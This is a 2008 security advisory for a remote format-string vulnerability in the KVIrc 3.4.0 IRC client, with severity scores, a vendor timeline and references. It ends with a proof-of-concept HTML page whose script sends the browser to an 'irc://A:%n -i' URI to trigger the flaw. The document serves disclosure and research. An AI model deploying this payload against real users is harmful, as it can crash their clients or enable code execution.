7.6 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
HIGH
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:H/Au:N/C:C/I:C/A:C
7.8 High
AI Score
Confidence
Low
0.084 Low
EPSS
Percentile
94.5%
Title: KVIrc 3.4.0 Virgo Remote Format String Exploit PoC
Advisory ID: ZSL-2008-4901
Type: Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 24.10.2008
KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit. KVirc is being written by Szymon Stefanek and the KVIrc Development Team with the contribution of many IRC addicted developers around the world.
KVIrc is prone to a remote format-string vulnerability because the application fails to properly sanitize user-supplied input before including it in the format-specifier argument of a formatted-printing function. A remote attacker may exploit this issue to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts may cause denial-of-service conditions.
Szymon Stefanek - <http://www.kvirc.net>
3.4.0 Virgo
Microsoft Windows XP Professional SP2 (English)
[29.10.2008] Vendor has knowledge about the issue.
[04.11.2008] Vendor releases patch.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <http://www.milw0rm.com/exploits/6832>
[2] <http://www.packetstormsecurity.org/filedesc/kvirc-format.txt.html>
[3] http://www.sebug.net/exploit/4944
[4] <http://www.securityfocus.com/bid/31912>
[5] <http://www.vupen.com/english/advisories/2008/2926>
[6] http://www.secunia.com/advisories/32410
[7] <http://www.juniper.net/security/auto/vulnerabilities/vuln31912.html>
[8] <https://vulners.com/cve/CVE-2008-4748>
[9] <http://xforce.iss.net/xforce/xfdb/46114>
[10] <http://it.com.mk/index.php/Gjoko-Krstikj/Sigurnost/KVIrc-v3.4.0-Virgo-Remote-Format-String-Exploit-PoC>
[11] <http://www.osvdb.org/show/osvdb/49352>
[24.10.2008] - Initial release
[27.10.2008] - Added reference [10]
[29.10.2008] - Added Vendor Status
[04.11.2008] - Updated Vendor Status
[03.05.2012] - Added reference [11]
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<!--
KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)
Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit.
KVirc is being written by Szymon Stefanek and the KVIrc Development Team with
the contribution of many IRC addicted developers around the world.
Product web page: http://www.kvirc.net/
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm [t00t] gmail [d0t] com
http://www.zeroscience.org
24.10.2008
--><html>
<head><title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</title>
</head><body>
<center> <br/> <br/> <strong>Warning ! :)</strong> </center>
<script type="text/javascript">
alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008");
function poc()
{
window.location.href = "irc://A:%n -i";
}
var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");
if (answ == true)
{
poc();
}
else
{
window.location.href = "http://www.kvirc.net";
}
</script> </body></html>